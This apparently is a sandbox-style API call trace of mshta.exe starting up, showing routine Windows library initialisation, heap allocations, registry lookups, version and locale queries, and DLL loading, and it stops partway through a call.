[0129.765] __dllonexit () returned 0x6de636e0 [0129.766] __dllonexit () returned 0x6de636f0 [0129.766] GetProcessHeap () returned 0x5e0000 [0129.766] __dllonexit () returned 0x6de63700 [0129.766] __dllonexit () returned 0x6de63710 [0129.766] __dllonexit () returned 0x6de62930 [0129.766] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc0ee [0129.767] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc0ee [0129.767] __dllonexit () returned 0x6de62950 [0129.767] __dllonexit () returned 0x6de62970 [0129.767] __dllonexit () returned 0x6de62990 [0129.768] __dllonexit () returned 0x6de629b0 [0129.768] __dllonexit () returned 0x6de629e0 [0129.768] __dllonexit () returned 0x6de629c0 [0129.768] __dllonexit () returned 0x6de629f0 [0129.768] __dllonexit () returned 0x6de629d0 [0129.769] __dllonexit () returned 0x6de629a0 [0129.769] GlobalMemoryStatusEx (in: lpBuffer=0x19f9c0 | out: lpBuffer=0x19f9c0) returned 1 [0129.769] __dllonexit () returned 0x6de62a00 [0129.770] __dllonexit () returned 0x6de62a10 [0129.770] __dllonexit () returned 0x6de62a30 [0129.770] __dllonexit () returned 0x6de62a50 [0129.770] __dllonexit () returned 0x6de62a70 [0129.770] __dllonexit () returned 0x6de62a90 [0129.770] __dllonexit () returned 0x6de62ab0 [0129.772] __dllonexit () returned 0x6de62ad0 [0129.773] QueryPerformanceFrequency (in: lpFrequency=0x19fa00 | out: lpFrequency=0x19fa00*=100000000) returned 1 [0129.773] __dllonexit () returned 0x6de62af0 [0129.773] __dllonexit () returned 0x6de62b00 [0129.773] __dllonexit () returned 0x6de62b70 [0129.773] __dllonexit () returned 0x6de62b30 [0129.773] __dllonexit () returned 0x6de62b40 [0129.774] __dllonexit () returned 0x6de62b50 [0129.774] __dllonexit () returned 0x6de62b60 [0129.774] __dllonexit () returned 0x6de62b20 [0129.774] __dllonexit () returned 0x6de62b80 [0129.774] __dllonexit () returned 0x6de62bb0 [0129.774] __dllonexit () returned 0x6de62ba0 [0129.774] __dllonexit () returned 0x6de62bc0 [0129.774] __dllonexit () returned 0x6de62be0 [0129.775] __dllonexit () returned 0x6de62c00 [0129.775] __dllonexit () returned 0x6de62c10 [0129.775] __dllonexit () returned 0x6de62c30 [0129.775] __dllonexit () returned 0x6de62cb0 [0129.775] __dllonexit () returned 0x6de62c90 [0129.775] __dllonexit () returned 0x6de62c70 [0129.775] __dllonexit () returned 0x6de62c50 [0129.775] RtlInitializeConditionVariable () returned 0x6e89651c [0129.775] RtlInitializeConditionVariable () returned 0x6e89652c [0129.775] __dllonexit () returned 0x6de62cd0 [0129.776] __dllonexit () returned 0x6de62cf0 [0129.776] __dllonexit () returned 0x6de62d00 [0129.776] __dllonexit () returned 0x6de62d10 [0129.776] __dllonexit () returned 0x6de62d30 [0129.776] __dllonexit () returned 0x6de62d50 [0129.776] __dllonexit () returned 0x6de62d70 [0129.776] __dllonexit () returned 0x6de62d80 [0129.776] __dllonexit () returned 0x6de62da0 [0129.776] __dllonexit () returned 0x6de62dc0 [0129.777] __dllonexit () returned 0x6de62de0 [0129.777] __dllonexit () returned 0x6de62df0 [0129.777] __dllonexit () returned 0x6de62e00 [0129.777] __dllonexit () returned 0x6de62e10 [0129.777] __dllonexit () returned 0x6de62e20 [0129.777] __dllonexit () returned 0x6de62e30 [0129.777] __dllonexit () returned 0x6de62e40 [0129.777] __dllonexit () returned 0x6de62e50 [0129.777] __dllonexit () returned 0x6de62e70 [0129.778] __dllonexit () returned 0x6de62e90 [0129.778] __dllonexit () returned 0x6de62ec0 [0129.778] __dllonexit () returned 0x6de62ed0 [0129.778] __dllonexit () returned 0x6de62f00 [0129.778] __dllonexit () returned 0x6de62f10 [0129.778] __dllonexit () returned 0x6de62f20 [0129.778] RtlInitializeConditionVariable () returned 0x6e89e950 [0129.778] __dllonexit () returned 0x6de62f40 [0129.778] __dllonexit () returned 0x6de62fa0 [0129.778] __dllonexit () returned 0x6de62f50 [0129.779] RtlInitializeConditionVariable () returned 0x6e8966d8 [0129.779] __dllonexit () returned 0x6de62f70 [0129.779] __dllonexit () returned 0x6de62f80 [0129.779] __dllonexit () returned 0x6de62fe0 [0129.779] __dllonexit () returned 0x6de62fc0 [0129.779] __dllonexit () returned 0x6de62ff0 [0129.779] __dllonexit () returned 0x6de63010 [0129.779] __dllonexit () returned 0x6de63030 [0129.779] RtlInitializeConditionVariable () returned 0x6e89e97c [0129.779] __dllonexit () returned 0x6de63050 [0129.779] __dllonexit () returned 0x6de63060 [0129.780] __dllonexit () returned 0x6de63080 [0129.780] __dllonexit () returned 0x6de63090 [0129.780] RtlInitializeConditionVariable () returned 0x6e89e980 [0129.780] __dllonexit () returned 0x6de630a0 [0129.781] __dllonexit () returned 0x6de630c0 [0129.781] __dllonexit () returned 0x6de630d0 [0129.781] __dllonexit () returned 0x6de630e0 [0129.781] __dllonexit () returned 0x6de63140 [0129.781] __dllonexit () returned 0x6de63130 [0129.781] __dllonexit () returned 0x6de63100 [0129.781] __dllonexit () returned 0x6de63120 [0129.781] __dllonexit () returned 0x6de63110 [0129.781] __dllonexit () returned 0x6de63150 [0129.782] __dllonexit () returned 0x6de63170 [0129.782] __dllonexit () returned 0x6de63190 [0129.782] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153 [0129.782] __dllonexit () returned 0x6de631a0 [0129.782] __dllonexit () returned 0x6de631f0 [0129.783] __dllonexit () returned 0x6de631b0 [0129.828] EtwEventRegister () returned 0x0 [0129.828] EtwEventRegister () returned 0x0 [0129.828] EtwEventRegister () returned 0x0 [0129.828] malloc (_Size=0xbc10) returned 0x8c2720 [0129.829] RtlInitializeSListHead (in: ListHead=0x8c2780 | out: ListHead=0x8c2780) [0129.829] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\ChakraRecycler", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f8b4 | out: phkResult=0x19f8b4*=0x0) returned 0x2 [0129.829] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\ChakraRecycler", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f8b4 | out: phkResult=0x19f8b4*=0x0) returned 0x2 [0129.830] GetModuleHandleW (lpModuleName=0x0) returned 0xee0000 [0129.830] RtlInitializeSListHead (in: ListHead=0x8c28f0 | out: ListHead=0x8c28f0) [0129.830] RtlInitializeSListHead (in: ListHead=0x8c2910 | out: ListHead=0x8c2910) [0129.830] RtlInitializeSListHead (in: ListHead=0x8c29c0 | out: ListHead=0x8c29c0) [0129.830] RtlInitializeSListHead (in: ListHead=0x8c29e0 | out: ListHead=0x8c29e0) [0129.830] RtlInitializeSListHead (in: ListHead=0x8c2a90 | out: ListHead=0x8c2a90) [0129.830] RtlInitializeSListHead (in: ListHead=0x8c2ab0 | out: ListHead=0x8c2ab0) [0129.830] malloc (_Size=0x113c) returned 0xbf0048 [0129.831] malloc (_Size=0x113c) returned 0xbf1190 [0129.833] QueryPerformanceFrequency (in: lpFrequency=0x8cd5b8 | out: lpFrequency=0x8cd5b8*=100000000) returned 1 [0129.834] malloc (_Size=0x78) returned 0x8ce338 [0129.834] rand_s (in: _RandomValue=0x19f840 | out: _RandomValue=0x19f840) returned 0x0 [0129.835] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x3000, flProtect=0x4) returned 0x450000 [0129.835] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5ea928 [0129.835] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5e71c0 [0129.836] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x5ea308 [0129.836] __dllonexit () returned 0x6de63250 [0129.836] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5ea7f0 [0129.836] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5ea810 [0129.836] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x5ea410 [0129.836] __dllonexit () returned 0x6de63260 [0129.836] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5e6d78 [0129.836] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5e6d98 [0129.836] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x5ea3b0 [0129.836] __dllonexit () returned 0x6de63240 [0129.837] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1408 [0129.837] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f14a8 [0129.837] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1308 [0129.837] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1588 [0129.837] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1528 [0129.837] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1268 [0129.837] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1208 [0129.837] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f13c8 [0129.837] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x28) returned 0x5e9d58 [0129.837] __dllonexit () returned 0x6de63280 [0129.837] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f15c8 [0129.837] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f15a8 [0129.837] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1288 [0129.837] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1448 [0129.837] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1228 [0129.837] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1428 [0129.837] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f14c8 [0129.837] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f14e8 [0129.837] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x28) returned 0x5e9ba8 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1468 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1328 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1548 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1388 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1248 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1568 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1348 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f12a8 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x28) returned 0x5e9e48 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1368 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f13a8 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1508 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f13e8 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f12c8 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1488 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f12e8 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1c38 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x28) returned 0x5e9c98 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1b98 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1ad8 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1d58 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1b78 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1b18 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1c58 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1bb8 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1bd8 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x28) returned 0x5e9bd8 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1c18 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1b38 [0129.838] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1bf8 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1c78 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1b58 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1c98 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1af8 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1cb8 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x28) returned 0x5e9c38 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1a58 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1d98 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1cd8 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1cf8 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1d18 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1d38 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1d78 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1db8 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x28) returned 0x5e9ea8 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1a18 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1ab8 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1a38 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1a78 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1a98 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f17b8 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f17d8 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f19d8 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x28) returned 0x5e9cc8 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1978 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1838 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1678 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1878 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f16f8 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1698 [0129.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f1738 [0129.840] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x5f17f8 [0129.840] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x28) returned 0x5e9cf8 [0129.840] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x28) returned 0x5e9d28 [0129.840] __dllonexit () returned 0x6de63270 [0129.840] __dllonexit () returned 0x6de63290 [0129.841] __dllonexit () returned 0x6de632a0 [0129.841] __dllonexit () returned 0x6de632b0 [0129.841] _CIsqrt () returned 0x4000027f [0129.841] __dllonexit () returned 0x6de632d0 [0129.841] __dllonexit () returned 0x6de632e0 [0129.842] __dllonexit () returned 0x6de632f0 [0129.842] __dllonexit () returned 0x6de63310 [0129.844] __dllonexit () returned 0x6de63330 [0129.844] __dllonexit () returned 0x6de63340 [0129.844] __dllonexit () returned 0x6de63360 [0129.844] __dllonexit () returned 0x6de63380 [0129.844] __dllonexit () returned 0x6de633a0 [0129.844] __dllonexit () returned 0x6de633b0 [0129.844] RtlInitializeConditionVariable () returned 0x6e898928 [0129.845] __dllonexit () returned 0x6de633c0 [0129.845] __dllonexit () returned 0x6de633d0 [0129.845] __dllonexit () returned 0x6de633e0 [0129.845] __dllonexit () returned 0x6de633f0 [0129.845] __dllonexit () returned 0x6de63400 [0129.846] __dllonexit () returned 0x6de63410 [0129.846] __dllonexit () returned 0x6de63430 [0129.846] __dllonexit () returned 0x6de63460 [0129.846] __dllonexit () returned 0x6de63470 [0129.847] __dllonexit () returned 0x6de63480 [0129.847] __dllonexit () returned 0x6de63490 [0129.847] __dllonexit () returned 0x6de634b0 [0129.847] __dllonexit () returned 0x6de634d0 [0129.847] __dllonexit () returned 0x6de63510 [0129.847] __dllonexit () returned 0x6de634f0 [0129.847] __dllonexit () returned 0x6de63500 [0129.847] __dllonexit () returned 0x6de63520 [0129.847] __dllonexit () returned 0x6de63540 [0129.848] __dllonexit () returned 0x6de63560 [0129.848] __dllonexit () returned 0x6de63570 [0129.848] __dllonexit () returned 0x6de63590 [0129.848] __dllonexit () returned 0x6de635a0 [0129.848] __dllonexit () returned 0x6de635b0 [0129.849] __dllonexit () returned 0x6de635c0 [0129.849] RtlInitializeConditionVariable () returned 0x6e89ec1c [0129.849] __dllonexit () returned 0x6de635d0 [0129.849] __dllonexit () returned 0x6de635e0 [0129.849] __dllonexit () returned 0x6de635f0 [0129.849] __dllonexit () returned 0x6de63600 [0129.850] __dllonexit () returned 0x6de63620 [0129.850] __dllonexit () returned 0x6de63610 [0129.853] __dllonexit () returned 0x6de63630 [0129.853] __dllonexit () returned 0x6de63640 [0129.853] __dllonexit () returned 0x6de63650 [0129.854] __dllonexit () returned 0x6de63680 [0129.854] __dllonexit () returned 0x6de636a0 [0129.854] __dllonexit () returned 0x6de63730 [0129.854] __dllonexit () returned 0x6de63720 [0129.854] __dllonexit () returned 0x6de637a0 [0129.854] GetCurrentThreadId () returned 0xb48 [0129.855] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19f7f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0129.855] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0129.855] StrCmpICW (pszStr1="mshta.exe", pszStr2="IEXPLORE.EXE") returned 4 [0129.855] StrCmpICW (pszStr1="mshta.exe", pszStr2="MSFEEDSSYNC.EXE") returned 2 [0129.855] StrCmpICW (pszStr1="mshta.exe", pszStr2="SYSPREP.EXE") returned -6 [0129.855] StrCmpICW (pszStr1="mshta.exe", pszStr2="EXPLORER.EXE") returned 8 [0129.855] StrCmpICW (pszStr1="mshta.exe", pszStr2="LOADER42.EXE") returned 1 [0129.855] StrCmpICW (pszStr1="mshta.exe", pszStr2="WWAHOST.EXE") returned -10 [0129.855] StrCmpICW (pszStr1="mshta.exe", pszStr2="IEUTLAUNCH.EXE") returned 4 [0129.855] StrCmpICW (pszStr1="mshta.exe", pszStr2="TE.EXE") returned -7 [0129.855] StrCmpICW (pszStr1="mshta.exe", pszStr2="Te.ProcessHost.exe") returned -7 [0129.855] StrCmpICW (pszStr1="mshta.exe", pszStr2="FAKEVIRTUALSURFACETESTAPP.EXE") returned 7 [0129.855] StrCmpICW (pszStr1="mshta.exe", pszStr2="MSOOBE.EXE") returned -7 [0129.855] StrCmpICW (pszStr1="mshta.exe", pszStr2="NETPLWIZ.EXE") returned -1 [0129.856] StrCmpICW (pszStr1="mshta.exe", pszStr2="USERACCOUNTBROKER.EXE") returned -8 [0129.856] StrCmpICW (pszStr1="mshta.exe", pszStr2="MSHTMPAD.EXE") returned -12 [0129.856] StrCmpICW (pszStr1="mshta.exe", pszStr2="FirstLogonAnim.exe") returned 7 [0129.856] StrCmpICW (pszStr1="mshta.exe", pszStr2="RESTOREOPTIN.EXE") returned -5 [0129.856] StrStrIW (lpFirst="mshta.exe", lpSrch="DCIScanner") returned 0x0 [0129.856] StrCmpICW (pszStr1="mshta.exe", pszStr2="microsoftedge.exe") returned 10 [0129.856] StrCmpICW (pszStr1="mshta.exe", pszStr2="microsoftedgecp.exe") returned 10 [0129.856] StrCmpICW (pszStr1="mshta.exe", pszStr2="pickerhost.exe") returned -3 [0129.856] FindAtomW (lpString="{4653C0A4-2B2D-48DE-AB80-93910A28F900}") returned 0x0 [0129.856] AddAtomW (lpString="{4653C0A4-2B2D-48DE-AB80-93910A28F900}") returned 0xc000 [0129.856] EtwEventRegister () returned 0x0 [0129.857] VirtualQuery (in: lpAddress=0x6e8a7000, lpBuffer=0x19f914, dwLength=0x1c | out: lpBuffer=0x19f914*(BaseAddress=0x6e8a7000, AllocationBase=0x6d6d0000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0129.857] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0129.857] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a90000 [0129.857] GetProcAddress (hModule=0x76a90000, lpProcName=0x6e774220) returned 0x772c2570 [0129.857] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f954 | out: lpflOldProtect=0x19f954*=0x4) returned 1 [0129.858] EtwEventSetInformation () returned 0x0 [0129.858] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0129.858] LoadLibraryExA (lpLibFileName="api-ms-win-downlevel-ole32-l1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x76da0000 [0129.858] GetProcAddress (hModule=0x76da0000, lpProcName="CoCreateGuid") returned 0x76e5e9c0 [0129.858] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f990 | out: lpflOldProtect=0x19f990*=0x4) returned 1 [0129.859] CoCreateGuid (in: pguid=0x6e89514c | out: pguid=0x6e89514c*(Data1=0xf4c7d524, Data2=0x6471, Data3=0x4f5e, Data4=([0]=0xaf, [1]=0xac, [2]=0x7d, [3]=0x51, [4]=0x32, [5]=0x82, [6]=0x30, [7]=0x34))) returned 0x0 [0129.859] RtlInitializeConditionVariable () returned 0x6e89b248 [0129.859] RtlInitializeConditionVariable () returned 0x6e89b244 [0129.859] RtlInitializeConditionVariable () returned 0x6e89b240 [0129.859] RtlInitializeConditionVariable () returned 0x6e89b23c [0129.859] RtlInitializeConditionVariable () returned 0x6e89b238 [0129.859] RtlInitializeConditionVariable () returned 0x6e89b234 [0129.860] RtlInitializeConditionVariable () returned 0x6e89b230 [0129.860] RtlInitializeConditionVariable () returned 0x6e89b22c [0129.860] RtlInitializeConditionVariable () returned 0x6e89b228 [0129.860] RtlInitializeConditionVariable () returned 0x6e89b224 [0129.860] RtlInitializeConditionVariable () returned 0x6e89b220 [0129.860] RtlInitializeConditionVariable () returned 0x6e89b21c [0129.860] RtlInitializeConditionVariable () returned 0x6e89b218 [0129.860] RtlInitializeConditionVariable () returned 0x6e89b214 [0129.860] RtlInitializeConditionVariable () returned 0x6e89b210 [0129.860] RtlInitializeConditionVariable () returned 0x6e89b20c [0129.860] RtlInitializeConditionVariable () returned 0x6e89b268 [0129.860] RtlInitializeConditionVariable () returned 0x6e89b208 [0129.860] RtlInitializeConditionVariable () returned 0x6e89b204 [0129.860] RtlInitializeConditionVariable () returned 0x6e89b200 [0129.927] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0129.927] LoadLibraryExA (lpLibFileName="urlmon.dll", hFile=0x0, dwFlags=0x0) returned 0x703b0000 [0129.935] GetProcAddress (hModule=0x703b0000, lpProcName="CoInternetIsFeatureEnabled") returned 0x70419e20 [0129.935] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f978 | out: lpflOldProtect=0x19f978*=0x4) returned 1 [0129.935] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0129.941] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0129.941] GetVersionExA (in: lpVersionInformation=0x6e899280*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x6e899280*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0129.942] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0129.946] GetSystemMetrics (nIndex=68) returned 4 [0129.946] GetSystemMetrics (nIndex=69) returned 4 [0129.946] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=20) returned 0x14 [0129.947] GetVersionExW (in: lpVersionInformation=0x19f854*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x19f844, dwMinorVersion=0x5f3080, dwBuildNumber=0x19faa8, dwPlatformId=0x772dee30, szCSDVersion="卪鏳￾￿\x19⏈瑔\x02") | out: lpVersionInformation=0x19f854*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0129.947] GetUserDefaultUILanguage () returned 0x409 [0129.947] GetLocaleInfoW (in: Locale=0x409, LCType=0x58, lpLCData=0x19f948, cchData=16 | out: lpLCData="\x03") returned 16 [0129.947] GetKeyboardLayoutList (in: nBuff=32, lpList=0x19f978 | out: lpList=0x19f978) returned 1 [0130.001] GetCurrentProcessId () returned 0xe14 [0130.001] ProcessIdToSessionId (in: dwProcessId=0xe14, pSessionId=0x19f968 | out: pSessionId=0x19f968) returned 1 [0130.001] WTSGetActiveConsoleSessionId () returned 0x1 [0130.001] HeapCreate (flOptions=0x0, dwInitialSize=0x0, dwMaximumSize=0x0) returned 0xe90000 [0130.002] GetVersion () returned 0x295a000a [0130.002] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x74530000 [0130.002] GetProcAddress (hModule=0x74530000, lpProcName="HeapSetInformation") returned 0x7454a8e0 [0130.003] HeapSetInformation (HeapHandle=0xe90000, HeapInformationClass=0x0, HeapInformation=0x19f9f8, HeapInformationLength=0x4) returned 1 [0130.003] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0130.003] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0130.003] RegisterClipboardFormatA (lpszFormat="Link Source") 